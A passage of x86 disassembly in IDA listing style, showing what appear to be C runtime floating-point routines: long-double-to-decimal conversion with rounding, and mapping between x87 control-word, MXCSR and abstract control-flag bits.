xor eax, eax
mov [ebp+var_1A+2], eax
mov [ebp-1Ch], eax
mov [ebp+var_20], eax
jmp loc_412F06
; ---------------------------------------------------------------------------
loc_412D10: ; CODE XREF: sub_412AB1+24D�j
xor esi, esi
cmp dx, si
jnz short loc_412D34
inc eax
test [ebp+var_1A+2], 7FFFFFFFh
jnz short loc_412D34
cmp [ebp-1Ch], esi
jnz short loc_412D34
cmp [ebp+var_20], esi
jnz short loc_412D34
mov word ptr [ebp+var_16], si
jmp loc_412F06
; ---------------------------------------------------------------------------
loc_412D34: ; CODE XREF: sub_412AB1+264�j
; sub_412AB1+26E�j ...
cmp di, si
jnz short loc_412D5D
mov edx, [ebp+var_64]
inc eax
test dword ptr [edx+8], 7FFFFFFFh
jnz short loc_412D5D
cmp [edx+4], esi
jnz short loc_412D5D
cmp [edx], esi
jnz short loc_412D5D
mov [ebp+var_1A+2], esi
mov [ebp-1Ch], esi
mov [ebp+var_20], esi
jmp loc_412F06
; ---------------------------------------------------------------------------
loc_412D5D: ; CODE XREF: sub_412AB1+286�j
; sub_412AB1+293�j ...
lea edi, [ebp+var_C]
mov [ebp+var_5C], esi
mov [ebp+var_44], edi
mov [ebp+var_40], 5
loc_412D6D: ; CODE XREF: sub_412AB1+332�j
mov edx, [ebp+var_5C]
mov esi, [ebp+var_40]
add edx, edx
test esi, esi
mov [ebp+var_50], esi
jle short loc_412DD4
lea edx, [ebp+edx+var_20]
mov [ebp+var_58], edx
mov edx, [ebp+var_64]
add edx, 8
mov [ebp+var_54], edx
loc_412D8C: ; CODE XREF: sub_412AB1+321�j
mov edx, [ebp+var_58]
mov esi, [ebp+var_54]
movzx esi, word ptr [esi]
movzx edx, word ptr [edx]
mov edi, [edi-4]
imul edx, esi
and [ebp+var_70], 0
lea esi, [edi+edx]
cmp esi, edi
jb short loc_412DAD
cmp esi, edx
jnb short loc_412DB4
loc_412DAD: ; CODE XREF: sub_412AB1+2F6�j
mov [ebp+var_70], 1
loc_412DB4: ; CODE XREF: sub_412AB1+2FA�j
cmp [ebp+var_70], 0
mov edi, [ebp+var_44]
mov [edi-4], esi
jz short loc_412DC3
inc word ptr [edi]
loc_412DC3: ; CODE XREF: sub_412AB1+30D�j
add [ebp+var_58], 2
sub [ebp+var_54], 2
dec [ebp+var_50]
cmp [ebp+var_50], 0
jg short loc_412D8C
loc_412DD4: ; CODE XREF: sub_412AB1+2C9�j
inc edi
inc edi
inc [ebp+var_5C]
dec [ebp+var_40]
cmp [ebp+var_40], 0
mov [ebp+var_44], edi
jg short loc_412D6D
add eax, 0C002h
test ax, ax
jle short loc_412E2A
loc_412DEF: ; CODE XREF: sub_412AB1+372�j
test [ebp+var_8], 80000000h
jnz short loc_412E25
mov edx, [ebp+var_10]
mov edi, [ebp+var_C]
mov esi, [ebp+var_C]
shl [ebp+var_10], 1
shr edx, 1Fh
add edi, edi
or edi, edx
mov edx, [ebp+var_8]
shr esi, 1Fh
add edx, edx
or edx, esi
add eax, 0FFFFh
test ax, ax
mov [ebp+var_C], edi
mov [ebp+var_8], edx
jg short loc_412DEF
loc_412E25: ; CODE XREF: sub_412AB1+345�j
test ax, ax
jg short loc_412E7C
loc_412E2A: ; CODE XREF: sub_412AB1+33C�j
add eax, 0FFFFh
test ax, ax
jge short loc_412E7C
mov edx, eax
neg edx
movzx edx, dx
mov [ebp+var_44], edx
add eax, edx
loc_412E40: ; CODE XREF: sub_412AB1+3BE�j
test byte ptr [ebp+var_10], 1
jz short loc_412E49
inc [ebp+var_48]
loc_412E49: ; CODE XREF: sub_412AB1+393�j
mov edx, [ebp+var_8]
mov edi, [ebp+var_C]
mov esi, [ebp+var_C]
shr [ebp+var_8], 1
shl edx, 1Fh
shr edi, 1
or edi, edx
mov edx, [ebp+var_10]
shl esi, 1Fh
shr edx, 1
or edx, esi
dec [ebp+var_44]
mov [ebp+var_C], edi
mov [ebp+var_10], edx
jnz short loc_412E40
cmp [ebp+var_48], 0
jz short loc_412E7C
or word ptr [ebp+var_10], 1
loc_412E7C: ; CODE XREF: sub_412AB1+377�j
; sub_412AB1+381�j ...
cmp word ptr [ebp+var_10], 8000h
ja short loc_412E95
mov edx, [ebp+var_10]
and edx, 1FFFFh
cmp edx, 18000h
jnz short loc_412EC8
loc_412E95: ; CODE XREF: sub_412AB1+3D1�j
cmp [ebp+var_10+2], 0FFFFFFFFh
jnz short loc_412EC5
and [ebp+var_10+2], 0
cmp [ebp+var_C+2], 0FFFFFFFFh
jnz short loc_412EC0
and [ebp+var_C+2], 0
cmp word ptr [ebp+var_8+2], 0FFFFh
jnz short loc_412EBA
mov word ptr [ebp+var_8+2], 8000h
inc eax
jmp short loc_412EC8
; ---------------------------------------------------------------------------
loc_412EBA: ; CODE XREF: sub_412AB1+3FE�j
inc word ptr [ebp+var_8+2]
jmp short loc_412EC8
; ---------------------------------------------------------------------------
loc_412EC0: ; CODE XREF: sub_412AB1+3F2�j
inc [ebp+var_C+2]
jmp short loc_412EC8
; ---------------------------------------------------------------------------
loc_412EC5: ; CODE XREF: sub_412AB1+3E8�j
inc [ebp+var_10+2]
loc_412EC8: ; CODE XREF: sub_412AB1+3E2�j
; sub_412AB1+407�j ...
cmp ax, 7FFFh
jnb short loc_412EEA
mov dx, word ptr [ebp+var_10+2]
mov word ptr [ebp+var_20], dx
mov edx, [ebp+var_C]
mov [ebp+var_20+2], edx
mov edx, [ebp+var_8]
or eax, ecx
mov [ebp+var_1A], edx
mov word ptr [ebp+var_16], ax
jmp short loc_412F06
; ---------------------------------------------------------------------------
loc_412EEA: ; CODE XREF: sub_412AB1+230�j
; sub_412AB1+239�j ...
neg cx
sbb ecx, ecx
and dword ptr [ebp-1Ch], 0
and ecx, 80000000h
add ecx, 7FFF8000h
and [ebp+var_20], 0
mov [ebp+var_1A+2], ecx
loc_412F06: ; CODE XREF: sub_412AB1+1D6�j
; sub_412AB1+25A�j ...
test ebx, ebx
jnz loc_412C79
xor eax, eax
loc_412F10: ; CODE XREF: sub_412AB1+1AB�j
; sub_412AB1+1C2�j
mov ecx, [ebp+var_1A+2]
shr ecx, 10h
cmp cx, 3FFFh
mov ebx, 7FFFh
jb loc_413170
mov esi, [ebp+var_28+2]
inc [ebp+var_4C]
movzx edx, cx
mov ecx, esi
xor ecx, edx
and edx, ebx
and esi, ebx
and ecx, 8000h
cmp dx, bx
lea edi, [esi+edx]
mov [ebp+var_58], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
movzx edi, di
jnb loc_413156
cmp si, bx
jnb loc_413156
cmp di, 0BFFDh
ja loc_413156
cmp di, 3FBFh
ja short loc_412F7B
loc_412F73: ; CODE XREF: sub_412AB1+503�j
mov [ebp+var_1A+2], eax
jmp loc_41316A
; ---------------------------------------------------------------------------
loc_412F7B: ; CODE XREF: sub_412AB1+4C0�j
cmp dx, ax
jnz short loc_412F9D
inc edi
test [ebp+var_1A+2], 7FFFFFFFh
jnz short loc_412F9D
cmp [ebp-1Ch], eax
jnz short loc_412F9D
cmp [ebp+var_20], eax
jnz short loc_412F9D
mov word ptr [ebp+var_16], ax
jmp loc_413170
; ---------------------------------------------------------------------------
loc_412F9D: ; CODE XREF: sub_412AB1+4CD�j
; sub_412AB1+4D7�j ...
cmp si, ax
jnz short loc_412FB6
inc edi
test [ebp+var_28], 7FFFFFFFh
jnz short loc_412FB6
cmp [ebp+var_2C], eax
jnz short loc_412FB6
cmp [ebp+var_30], eax
jz short loc_412F73
loc_412FB6: ; CODE XREF: sub_412AB1+4EF�j
; sub_412AB1+4F9�j ...
and [ebp+var_54], 0
lea eax, [ebp+var_C]
mov [ebp+var_40], 5
loc_412FC4: ; CODE XREF: sub_412AB1+580�j
mov edx, [ebp+var_54]
mov esi, [ebp+var_40]
add edx, edx
test esi, esi
mov [ebp+var_50], esi
jle short loc_413025
lea esi, [ebp+var_28]
lea edx, [ebp+edx+var_20]
mov [ebp+var_5C], esi
mov [ebp+var_48], edx
loc_412FE0: ; CODE XREF: sub_412AB1+572�j
mov edx, [ebp+var_5C]
mov esi, [ebp+var_48]
movzx esi, word ptr [esi]
movzx edx, word ptr [edx]
and [ebp+var_44], 0
imul edx, esi
mov esi, [eax-4]
lea ebx, [esi+edx]
cmp ebx, esi
jb short loc_413001
cmp ebx, edx
jnb short loc_413008
loc_413001: ; CODE XREF: sub_412AB1+54A�j
mov [ebp+var_44], 1
loc_413008: ; CODE XREF: sub_412AB1+54E�j
cmp [ebp+var_44], 0
mov [eax-4], ebx
jz short loc_413014
inc word ptr [eax]
loc_413014: ; CODE XREF: sub_412AB1+55E�j
add [ebp+var_48], 2
sub [ebp+var_5C], 2
dec [ebp+var_50]
cmp [ebp+var_50], 0
jg short loc_412FE0
loc_413025: ; CODE XREF: sub_412AB1+520�j
inc eax
inc eax
inc [ebp+var_54]
dec [ebp+var_40]
cmp [ebp+var_40], 0
jg short loc_412FC4
add edi, 0C002h
xor eax, eax
cmp di, ax
jle short loc_41307C
loc_413040: ; CODE XREF: sub_412AB1+5C4�j
test [ebp+var_8], 80000000h
jnz short loc_413077
mov edx, [ebp+var_10]
mov ebx, [ebp+var_C]
mov esi, [ebp+var_C]
shl [ebp+var_10], 1
shr edx, 1Fh
add ebx, ebx
or ebx, edx
mov edx, [ebp+var_8]
shr esi, 1Fh
add edx, edx
or edx, esi
add edi, 0FFFFh
cmp di, ax
mov [ebp+var_C], ebx
mov [ebp+var_8], edx
jg short loc_413040
loc_413077: ; CODE XREF: sub_412AB1+596�j
cmp di, ax
jg short loc_4130CB
loc_41307C: ; CODE XREF: sub_412AB1+58D�j
add edi, 0FFFFh
cmp di, ax
jge short loc_4130CB
mov eax, edi
neg eax
movzx eax, ax
add edi, eax
loc_413090: ; CODE XREF: sub_412AB1+60C�j
test byte ptr [ebp+var_10], 1
jz short loc_413099
inc [ebp+var_58]
loc_413099: ; CODE XREF: sub_412AB1+5E3�j
mov edx, [ebp+var_8]
mov ebx, [ebp+var_C]
mov esi, [ebp+var_C]
shr [ebp+var_8], 1
shl edx, 1Fh
shr ebx, 1
or ebx, edx
mov edx, [ebp+var_10]
shl esi, 1Fh
shr edx, 1
or edx, esi
dec eax
mov [ebp+var_C], ebx
mov [ebp+var_10], edx
jnz short loc_413090
xor eax, eax
cmp [ebp+var_58], eax
jz short loc_4130CB
or word ptr [ebp+var_10], 1
loc_4130CB: ; CODE XREF: sub_412AB1+5C9�j
; sub_412AB1+5D4�j ...
cmp word ptr [ebp+var_10], 8000h
ja short loc_4130E4
mov edx, [ebp+var_10]
and edx, 1FFFFh
cmp edx, 18000h
jnz short loc_413115
loc_4130E4: ; CODE XREF: sub_412AB1+620�j
cmp [ebp+var_10+2], 0FFFFFFFFh
jnz short loc_413112
cmp [ebp+var_C+2], 0FFFFFFFFh
mov [ebp+var_10+2], eax
jnz short loc_41310D
cmp word ptr [ebp+var_8+2], 0FFFFh
mov [ebp+var_C+2], eax
jnz short loc_413107
mov word ptr [ebp+var_8+2], 8000h
inc edi
jmp short loc_413115
; ---------------------------------------------------------------------------
loc_413107: ; CODE XREF: sub_412AB1+64B�j
inc word ptr [ebp+var_8+2]
jmp short loc_413115
; ---------------------------------------------------------------------------
loc_41310D: ; CODE XREF: sub_412AB1+640�j
inc [ebp+var_C+2]
jmp short loc_413115
; ---------------------------------------------------------------------------
loc_413112: ; CODE XREF: sub_412AB1+637�j
inc [ebp+var_10+2]
loc_413115: ; CODE XREF: sub_412AB1+631�j
; sub_412AB1+654�j ...
cmp di, 7FFFh
jb short loc_41313A
neg cx
mov [ebp-1Ch], eax
mov [ebp+var_20], eax
sbb ecx, ecx
and ecx, 80000000h
add ecx, 7FFF8000h
mov [ebp+var_1A+2], ecx
loc_413136: ; CODE XREF: sub_412AB1+6A3�j
xor eax, eax
jmp short loc_413170
; ---------------------------------------------------------------------------
loc_41313A: ; CODE XREF: sub_412AB1+669�j
mov ax, word ptr [ebp+var_10+2]
mov word ptr [ebp+var_20], ax
mov eax, [ebp+var_C]
mov [ebp+var_20+2], eax
mov eax, [ebp+var_8]
or edi, ecx
mov [ebp+var_1A], eax
mov word ptr [ebp+var_16], di
jmp short loc_413136
; ---------------------------------------------------------------------------
loc_413156: ; CODE XREF: sub_412AB1+4A1�j
; sub_412AB1+4AA�j ...
neg cx
sbb ecx, ecx
and ecx, 80000000h
add ecx, 7FFF8000h
mov [ebp+var_1A+2], ecx
loc_41316A: ; CODE XREF: sub_412AB1+4C5�j
mov [ebp-1Ch], eax
mov [ebp+var_20], eax
loc_413170: ; CODE XREF: sub_412AB1+46F�j
; sub_412AB1+4E7�j ...
test [ebp+arg_10], 1
mov edx, [ebp+var_60]
mov ecx, [ebp+var_4C]
mov [edx], cx
jz short loc_4131B1
movsx ecx, cx
add [ebp+arg_C], ecx
cmp [ebp+arg_C], eax
jg short loc_4131B1
and word ptr [edx], 0
cmp word ptr [ebp+var_6C], 8000h
mov byte ptr [edx+3], 1
setnz al
dec al
and al, 0Dh
add al, 20h
mov [edx+2], al
mov byte ptr [edx+4], 30h
mov byte ptr [edx+5], 0
jmp loc_412B60
; ---------------------------------------------------------------------------
loc_4131B1: ; CODE XREF: sub_412AB1+6CC�j
; sub_412AB1+6D7�j
push 15h
pop ecx
cmp [ebp+arg_C], ecx
jle short loc_4131BC
mov [ebp+arg_C], ecx
loc_4131BC: ; CODE XREF: sub_412AB1+706�j
mov esi, [ebp+var_1A+2]
shr esi, 10h
push 8
sub esi, 3FFEh
mov word ptr [ebp+var_16], ax
pop ebx
loc_4131CF: ; CODE XREF: sub_412AB1+742�j
mov eax, [ebp+var_20]
mov edi, [ebp-1Ch]
mov ecx, [ebp-1Ch]
shl [ebp+var_20], 1
shr eax, 1Fh
add edi, edi
or edi, eax
mov eax, [ebp+var_1A+2]
shr ecx, 1Fh
add eax, eax
or eax, ecx
dec ebx
mov [ebp-1Ch], edi
mov [ebp+var_1A+2], eax
jnz short loc_4131CF
test esi, esi
jge short loc_41322B
neg esi
and esi, 0FFh
jle short loc_41322B
loc_413203: ; CODE XREF: sub_412AB1+778�j
mov eax, [ebp+var_1A+2]
mov edi, [ebp-1Ch]
mov ecx, [ebp-1Ch]
shr [ebp+var_1A+2], 1
shl eax, 1Fh
shr edi, 1
or edi, eax
mov eax, [ebp+var_20]
shl ecx, 1Fh
shr eax, 1
or eax, ecx
dec esi
test esi, esi
mov [ebp-1Ch], edi
mov [ebp+var_20], eax
jg short loc_413203
loc_41322B: ; CODE XREF: sub_412AB1+746�j
; sub_412AB1+750�j
mov eax, [ebp+arg_C]
inc eax
test eax, eax
lea ebx, [edx+4]
mov [ebp+var_40], ebx
mov [ebp+var_4C], eax
jle loc_4132F5
loc_413240: ; CODE XREF: sub_412AB1+83E�j
mov edx, [ebp+var_20]
mov eax, [ebp-1Ch]
lea esi, [ebp+var_20]
lea edi, [ebp+var_3C]
movsd
movsd
movsd
shl [ebp+var_20], 1
mov edi, [ebp+var_20]
shl [ebp+var_20], 1
shr edx, 1Fh
lea ecx, [eax+eax]
or ecx, edx
mov edx, [ebp+var_1A+2]
mov esi, eax
shr esi, 1Fh
add edx, edx
or edx, esi
mov eax, ecx
lea esi, [ecx+ecx]
shr eax, 1Fh
lea ecx, [edx+edx]
mov edx, [ebp+var_3C]
shr edi, 1Fh
or ecx, eax
mov eax, [ebp+var_20]
or esi, edi
lea edi, [edx+eax]
cmp edi, eax
jb short loc_41328F
cmp edi, edx
jnb short loc_4132A7
loc_41328F: ; CODE XREF: sub_412AB1+7D8�j
lea eax, [esi+1]
xor edx, edx
cmp eax, esi
jb short loc_41329D
cmp eax, 1
jnb short loc_4132A0
loc_41329D: ; CODE XREF: sub_412AB1+7E5�j
xor edx, edx
inc edx
loc_4132A0: ; CODE XREF: sub_412AB1+7EA�j
test edx, edx
mov esi, eax
jz short loc_4132A7
inc ecx
loc_4132A7: ; CODE XREF: sub_412AB1+7DC�j
; sub_412AB1+7F3�j
mov eax, [ebp+var_38]
lea edx, [eax+esi]
cmp edx, esi
mov [ebp+var_44], edx
jb short loc_4132B8
cmp edx, eax
jnb short loc_4132B9
loc_4132B8: ; CODE XREF: sub_412AB1+801�j
inc ecx
loc_4132B9: ; CODE XREF: sub_412AB1+805�j
add ecx, [ebp+var_34]
shr edx, 1Fh
add ecx, ecx
or ecx, edx
lea esi, [edi+edi]
mov [ebp+var_20], esi
mov esi, [ebp+var_44]
mov [ebp+var_1A+2], ecx
shr ecx, 18h
add esi, esi
add cl, 30h
mov eax, edi
shr eax, 1Fh
or esi, eax
mov [ebx], cl
inc ebx
dec [ebp+var_4C]
cmp [ebp+var_4C], 0
mov [ebp-1Ch], esi
mov byte ptr [ebp+var_16+1], 0
jg loc_413240
loc_4132F5: ; CODE XREF: sub_412AB1+789�j
dec ebx
mov al, [ebx]
dec ebx
cmp al, 35h
jge short loc_41330B
mov ecx, [ebp+var_40]
jmp short loc_413346
; ---------------------------------------------------------------------------
loc_413302: ; CODE XREF: sub_412AB1+85D�j
cmp byte ptr [ebx], 39h
jnz short loc_413310
mov byte ptr [ebx], 30h
dec ebx
loc_41330B: ; CODE XREF: sub_412AB1+84A�j
cmp ebx, [ebp+var_40]
jnb short loc_413302
loc_413310: ; CODE XREF: sub_412AB1+854�j
cmp ebx, [ebp+var_40]
mov eax, [ebp+var_60]
jnb short loc_41331C
inc ebx
inc word ptr [eax]
loc_41331C: ; CODE XREF: sub_412AB1+865�j
inc byte ptr [ebx]
loc_41331E: ; CODE XREF: sub_412AB1+89E�j
sub bl, al
sub bl, 3
movsx ecx, bl
mov [eax+3], bl
mov byte ptr [ecx+eax+4], 0
mov eax, [ebp+var_74]
loc_413331: ; CODE XREF: sub_412AB1+B2�j
; sub_412AB1+15B�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
; ---------------------------------------------------------------------------
loc_413340: ; CODE XREF: sub_412AB1+897�j
cmp byte ptr [ebx], 30h
jnz short loc_41334A
dec ebx
loc_413346: ; CODE XREF: sub_412AB1+84F�j
cmp ebx, ecx
jnb short loc_413340
loc_41334A: ; CODE XREF: sub_412AB1+892�j
cmp ebx, ecx
mov eax, [ebp+var_60]
jnb short loc_41331E
and word ptr [eax], 0
cmp word ptr [ebp+var_6C], 8000h
mov byte ptr [eax+3], 1
setnz dl
dec dl
and dl, 0Dh
add dl, 20h
mov [eax+2], dl
mov byte ptr [ecx], 30h
mov byte ptr [eax+5], 0
jmp loc_412B60
sub_412AB1 endp
; =============== S U B R O U T I N E =======================================
sub_413379 proc near ; CODE XREF: sub_4134A7+C0�p
xor eax, eax
test bl, 10h
jz short loc_413381
inc eax
loc_413381: ; CODE XREF: sub_413379+5�j
test bl, 8
jz short loc_413389
or eax, 4
loc_413389: ; CODE XREF: sub_413379+B�j
test bl, 4
jz short loc_413391
or eax, 8
loc_413391: ; CODE XREF: sub_413379+13�j
test bl, 2
jz short loc_413399
or eax, 10h
loc_413399: ; CODE XREF: sub_413379+1B�j
test bl, 1
jz short loc_4133A1
or eax, 20h
loc_4133A1: ; CODE XREF: sub_413379+23�j
test ebx, 80000h
jz short loc_4133AC
or eax, 2
loc_4133AC: ; CODE XREF: sub_413379+2E�j
mov ecx, ebx
mov edx, 300h
and ecx, edx
push esi
mov esi, 200h
jz short loc_4133E0
cmp ecx, 100h
jz short loc_4133DB
cmp ecx, esi
jz short loc_4133D4
cmp ecx, edx
jnz short loc_4133E0
or eax, 0C00h
jmp short loc_4133E0
; ---------------------------------------------------------------------------
loc_4133D4: ; CODE XREF: sub_413379+4E�j
or eax, 800h
jmp short loc_4133E0
; ---------------------------------------------------------------------------
loc_4133DB: ; CODE XREF: sub_413379+4A�j
or eax, 400h
loc_4133E0: ; CODE XREF: sub_413379+42�j
; sub_413379+52�j ...
mov ecx, ebx
and ecx, 30000h
jz short loc_4133F6
cmp ecx, 10000h
jnz short loc_4133F8
or eax, esi
jmp short loc_4133F8
; ---------------------------------------------------------------------------
loc_4133F6: ; CODE XREF: sub_413379+6F�j
or eax, edx
loc_4133F8: ; CODE XREF: sub_413379+77�j
; sub_413379+7B�j
test ebx, 40000h
pop esi
jz short locret_413406
or eax, 1000h
locret_413406: ; CODE XREF: sub_413379+86�j
retn
sub_413379 endp
; =============== S U B R O U T I N E =======================================
sub_413407 proc near ; CODE XREF: sub_4134A7:loc_4136E0�p
xor eax, eax
test dl, 10h
jz short loc_413413
mov eax, 80h
loc_413413: ; CODE XREF: sub_413407+5�j
test dl, 8
push ebx
push esi
push edi
mov ebx, 200h
jz short loc_413422
or eax, ebx
loc_413422: ; CODE XREF: sub_413407+17�j
test dl, 4
jz short loc_41342C
or eax, 400h
loc_41342C: ; CODE XREF: sub_413407+1E�j
test dl, 2
jz short loc_413436
or eax, 800h
loc_413436: ; CODE XREF: sub_413407+28�j
test dl, 1
jz short loc_413440
or eax, 1000h
loc_413440: ; CODE XREF: sub_413407+32�j
test edx, 80000h
mov edi, 100h
jz short loc_41344F
or eax, edi
loc_41344F: ; CODE XREF: sub_413407+44�j
mov ecx, edx
mov esi, 300h
and ecx, esi
jz short loc_413479
cmp ecx, edi
jz short loc_413474
cmp ecx, ebx
jz short loc_41346D
cmp ecx, esi
jnz short loc_413479
or eax, 6000h
jmp short loc_413479
; ---------------------------------------------------------------------------
loc_41346D: ; CODE XREF: sub_413407+59�j
or eax, 4000h
jmp short loc_413479
; ---------------------------------------------------------------------------
loc_413474: ; CODE XREF: sub_413407+55�j
or eax, 2000h
loc_413479: ; CODE XREF: sub_413407+51�j
; sub_413407+5D�j ...
mov ecx, 3000000h
pop edi
and edx, ecx
cmp edx, 1000000h
pop esi
pop ebx
jz short loc_4134A1
cmp edx, 2000000h
jz short loc_41349D
cmp edx, ecx
jnz short locret_4134A6
or eax, 8000h
retn
; ---------------------------------------------------------------------------
loc_41349D: ; CODE XREF: sub_413407+8A�j
or eax, 40h
retn
; ---------------------------------------------------------------------------
loc_4134A1: ; CODE XREF: sub_413407+82�j
or eax, 8040h
locret_4134A6: ; CODE XREF: sub_413407+8E�j
retn
sub_413407 endp
; =============== S U B R O U T I N E =======================================
sub_4134A7 proc near ; CODE XREF: sub_4118FF+25�p
; sub_4118FF+55�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 10h
push ebx
push ebp
push esi
push edi
fstcw word ptr [esp+20h+var_C]
mov ebx, [esp+20h+var_C]
xor edx, edx
test bl, 1
jz short loc_4134C1
push 10h
pop edx
loc_4134C1: ; CODE XREF: sub_4134A7+15�j
test bl, 4
jz short loc_4134C9
or edx, 8
loc_4134C9: ; CODE XREF: sub_4134A7+1D�j
test bl, 8
jz short loc_4134D1
or edx, 4
loc_4134D1: ; CODE XREF: sub_4134A7+25�j
test bl, 10h
jz short loc_4134D9
or edx, 2
loc_4134D9: ; CODE XREF: sub_4134A7+2D�j
test bl, 20h
jz short loc_4134E1
or edx, 1
loc_4134E1: ; CODE XREF: sub_4134A7+35�j
test bl, 2
jz short loc_4134EC
or edx, 80000h
loc_4134EC: ; CODE XREF: sub_4134A7+3D�j
movzx ecx, bx
mov eax, ecx
mov edi, 0C00h
and eax, edi
mov ebp, 300h
mov esi, 200h
jz short loc_413524
cmp eax, 400h
jz short loc_41351E
cmp eax, 800h
jz short loc_41351A
cmp eax, edi
jnz short loc_413524
or edx, ebp
jmp short loc_413524
; ---------------------------------------------------------------------------
loc_41351A: ; CODE XREF: sub_4134A7+69�j
or edx, esi
jmp short loc_413524
; ---------------------------------------------------------------------------
loc_41351E: ; CODE XREF: sub_4134A7+62�j
or edx, 100h
loc_413524: ; CODE XREF: sub_4134A7+5B�j
; sub_4134A7+6D�j ...
and ecx, ebp
jz short loc_413534
cmp ecx, esi
jnz short loc_41353A
or edx, 10000h
jmp short loc_41353A
; ---------------------------------------------------------------------------
loc_413534: ; CODE XREF: sub_4134A7+7F�j
or edx, 20000h
loc_41353A: ; CODE XREF: sub_4134A7+83�j
; sub_4134A7+8B�j
test bx, 1000h
jz short loc_413547
or edx, 40000h
loc_413547: ; CODE XREF: sub_4134A7+98�j
mov esi, [esp+20h+arg_4]
mov ecx, [esp+20h+arg_0]
mov eax, esi
not eax
and eax, edx
and ecx, esi
or eax, ecx
cmp eax, edx
mov [esp+20h+var_4], eax
jz loc_41360F
mov ebx, eax
call sub_413379
movzx eax, ax
mov [esp+20h+var_10], eax
fldcw word ptr [esp+20h+var_10]
fstcw word ptr [esp+20h+var_10]
mov ebx, [esp+20h+var_10]
xor edx, edx
test bl, 1
jz short loc_41358A
push 10h
pop edx
loc_41358A: ; CODE XREF: sub_4134A7+DE�j
test bl, 4
jz short loc_413592
or edx, 8
loc_413592: ; CODE XREF: sub_4134A7+E6�j
test bl, 8
jz short loc_41359A
or edx, 4
loc_41359A: ; CODE XREF: sub_4134A7+EE�j
test bl, 10h
jz short loc_4135A2
or edx, 2
loc_4135A2: ; CODE XREF: sub_4134A7+F6�j
test bl, 20h
jz short loc_4135AA
or edx, 1
loc_4135AA: ; CODE XREF: sub_4134A7+FE�j
test bl, 2
jz short loc_4135B5
or edx, 80000h
loc_4135B5: ; CODE XREF: sub_4134A7+106�j
movzx ecx, bx
mov eax, ecx
and eax, edi
jz short loc_4135E2
cmp eax, 400h
jz short loc_4135DC
cmp eax, 800h
jz short loc_4135D4
cmp eax, edi
jnz short loc_4135E2
or edx, ebp
jmp short loc_4135E2
; ---------------------------------------------------------------------------
loc_4135D4: ; CODE XREF: sub_4134A7+123�j
or edx, 200h
jmp short loc_4135E2
; ---------------------------------------------------------------------------
loc_4135DC: ; CODE XREF: sub_4134A7+11C�j
or edx, 100h
loc_4135E2: ; CODE XREF: sub_4134A7+115�j
; sub_4134A7+127�j ...
and ecx, ebp
jz short loc_4135F6
cmp ecx, 200h
jnz short loc_4135FC
or edx, 10000h
jmp short loc_4135FC
; ---------------------------------------------------------------------------
loc_4135F6: ; CODE XREF: sub_4134A7+13D�j
or edx, 20000h
loc_4135FC: ; CODE XREF: sub_4134A7+145�j
; sub_4134A7+14D�j
test bx, 1000h
jz short loc_413609
or edx, 40000h
loc_413609: ; CODE XREF: sub_4134A7+15A�j
mov eax, edx
mov [esp+20h+var_4], edx
loc_41360F: ; CODE XREF: sub_4134A7+B8�j
cmp ds:dword_433C7C, 0
jz loc_4137A2
and esi, 308031Fh
mov edi, esi
stmxcsr [esp+20h+var_8]
mov eax, [esp+20h+var_8]
xor esi, esi
test al, al
jns short loc_413636
push 10h
pop esi
loc_413636: ; CODE XREF: sub_4134A7+18A�j
test ax, 200h
jz short loc_41363F
or esi, 8
loc_41363F: ; CODE XREF: sub_4134A7+193�j
test ax, 400h
jz short loc_413648
or esi, 4
loc_413648: ; CODE XREF: sub_4134A7+19C�j
test ax, 800h
jz short loc_413651
or esi, 2
loc_413651: ; CODE XREF: sub_4134A7+1A5�j
test ax, 1000h
jz short loc_41365A
or esi, 1
loc_41365A: ; CODE XREF: sub_4134A7+1AE�j
test ax, 100h
jz short loc_413666
or esi, 80000h
loc_413666: ; CODE XREF: sub_4134A7+1B7�j
mov ecx, eax
mov ebp, 6000h
and ecx, ebp
jz short loc_41369B
cmp ecx, 2000h
jz short loc_413695
cmp ecx, 4000h
jz short loc_41368D
cmp ecx, ebp
jnz short loc_41369B
or esi, 300h
jmp short loc_41369B
; ---------------------------------------------------------------------------
loc_41368D: ; CODE XREF: sub_4134A7+1D8�j
or esi, 200h
jmp short loc_41369B
; ---------------------------------------------------------------------------
loc_413695: ; CODE XREF: sub_4134A7+1D0�j
or esi, 100h
loc_41369B: ; CODE XREF: sub_4134A7+1C8�j
; sub_4134A7+1DC�j ...
mov ebx, 8040h
and eax, ebx
sub eax, 40h
jz short loc_4136C3
sub eax, 7FC0h
jz short loc_4136BB
sub eax, 40h
jnz short loc_4136C9
or esi, 1000000h
jmp short loc_4136C9
; ---------------------------------------------------------------------------
loc_4136BB: ; CODE XREF: sub_4134A7+205�j
or esi, 3000000h
jmp short loc_4136C9
; ---------------------------------------------------------------------------
loc_4136C3: ; CODE XREF: sub_4134A7+1FE�j
or esi, 2000000h
loc_4136C9: ; CODE XREF: sub_4134A7+20A�j
; sub_4134A7+212�j ...
mov edx, edi
and edi, [esp+20h+arg_0]
not edx
and edx, esi
or edx, edi
cmp edx, esi
jnz short loc_4136E0
mov eax, esi
jmp loc_41378B
; ---------------------------------------------------------------------------
loc_4136E0: ; CODE XREF: sub_4134A7+230�j
call sub_413407
push eax
mov [esp+24h+arg_4], eax
call sub_4100DA
pop ecx
stmxcsr [esp+20h+arg_4]
mov eax, [esp+20h+arg_4]
xor edx, edx
test al, al
jns short loc_413702
push 10h
pop edx
loc_413702: ; CODE XREF: sub_4134A7+256�j
mov edi, 200h
test eax, edi
jz short loc_41370E
or edx, 8
loc_41370E: ; CODE XREF: sub_4134A7+262�j
test ax, 400h
jz short loc_413717
or edx, 4
loc_413717: ; CODE XREF: sub_4134A7+26B�j
test ax, 800h
jz short loc_413720
or edx, 2
loc_413720: ; CODE XREF: sub_4134A7+274�j
test ax, 1000h
jz short loc_413729
or edx, 1
loc_413729: ; CODE XREF: sub_4134A7+27D�j
mov esi, 100h
test eax, esi
jz short loc_413738
or edx, 80000h
loc_413738: ; CODE XREF: sub_4134A7+289�j
mov ecx, eax
and ecx, ebp
jz short loc_413760
cmp ecx, 2000h
jz short loc_41375E
cmp ecx, 4000h
jz short loc_41375A
cmp ecx, ebp
jnz short loc_413760
or edx, 300h
jmp short loc_413760
; ---------------------------------------------------------------------------
loc_41375A: ; CODE XREF: sub_4134A7+2A5�j
or edx, edi
jmp short loc_413760
